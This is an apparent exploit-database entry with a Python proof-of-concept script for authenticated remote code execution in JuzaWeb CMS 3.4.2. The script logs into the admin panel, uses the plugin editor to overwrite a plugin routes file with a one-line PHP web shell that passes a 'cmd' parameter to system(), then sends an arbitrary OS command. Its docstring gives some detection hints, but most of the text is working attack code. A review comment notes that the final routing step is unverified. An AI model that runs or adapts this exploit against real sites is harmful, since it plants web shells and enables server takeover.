JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution

2026.05.19
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution
# Date: 2026-01-10
# Exploit Author: Sardor Shoakbarov
# Author GitHub: https://github.com/TheDeepOpc
# Vendor Homepage: https://juzaweb.com/
# Software Link: https://github.com/juzaweb/
# CVE: N/A (Pending)

import requests
import argparse
from bs4 import BeautifulSoup


def run_exploit() -> None:
    """Proof of concept: log in to the JuzaWeb admin panel, overwrite a plugin
    file through the plugin editor, then request the injected route.

    Reads the target URL, admin credentials and an OS command from the command
    line; prints progress messages and the HTTP response body of the final
    request. Returns None; a failed login or any exception during the login
    step ends the run early.

    Defensive takeaways (from what this script does, not from the CMS source):
      * every step is an *authenticated* admin action -- the script relies on
        the plugin editor at /admin-cp/plugins/editor accepting the PHP it
        sends in the `content` field, so admin credentials are the barrier;
      * the observable sequence is a POST to that editor endpoint whose
        `content` contains `system(` / `$_GET`, followed by a request carrying
        a `cmd` query parameter; file-integrity monitoring on the plugin's
        `src/routes/api.php` would also catch the overwrite.
    """
    parser = argparse.ArgumentParser(description='JuzaWeb Authenticated RCE')
    # Short flags mirror the author's usage line; all four are mandatory.
    parser.add_argument('-u', '--url', help='Target URL (e.g. http://127.0.0.1:8000)', required=True)
    parser.add_argument('-user', '--username', help='Admin Username/Email', required=True)
    parser.add_argument('-p', '--password', help='Admin Password', required=True)
    parser.add_argument('-cmd', '--command', help='OS Command to execute (e.g. "ls", "id")', required=True)
    args = parser.parse_args()

    target = args.url.rstrip('/')
    # One Session so the cookies set at login are reused by the later requests.
    session = requests.Session()

    print(f"[*] Targeting: {target}")

    # Step 1: Login
    login_url = f"{target}/admin-cp/login"
    try:
        get_login = session.get(login_url)
        soup = BeautifulSoup(get_login.text, 'html.parser')
        # The CSRF token is read from the hidden `_token` input on the login
        # form. If that input is absent, soup.find() returns None and the
        # subscript raises TypeError, which the broad except below reports.
        token = soup.find('input', {'name': '_token'})['value']

        login_data = {
            '_token': token,
            'email': args.username,
            'password': args.password
        }
        res = session.post(login_url, data=login_data)

        # Success is inferred only from the word "Dashboard" in the response body.
        if "Dashboard" not in res.text:
            print("[-] Login failed. Check credentials.")
            return
        print("[+] Login Successful.")
    except Exception as e:
        # Catch-all: network errors, a missing token and parse errors all land here.
        print(f"[-] Error during login: {e}")
        return

    # Step 2: Inject Web Shell
    # Injecting system() into a plugin file as described in the report
    print("[*] Injecting payload into Plugin Editor...")
    editor_url = f"{target}/admin-cp/plugins/editor"
    # PHP that hands the `cmd` query parameter to system() and then stops.
    shell_payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); die; } ?>"

    inject_data = {
        'file': 'src/routes/api.php', # File to overwrite
        'content': shell_payload,
        'plugin': 'juzaweb/example' # Targeted plugin
    }
    # The editor's response is not inspected; whether the write was accepted
    # is only visible indirectly through the body printed in step 3.
    session.post(editor_url, data=inject_data)

    # Step 3: Execute Command
    # Accessing the modified route to trigger the command
    print(f"[*] Executing command: {args.command}")
    # NOTE(review): the script assumes this admin URL is served by the
    # overwritten plugin file; that routing cannot be verified from the script.
    exec_url = f"{target}/admin-cp/plugins?cmd={args.command}"
    response = session.get(exec_url)

    print("\n--- Output ---")
    print(response.text.strip())
    print("--------------")


if __name__ == "__main__":
    run_exploit()

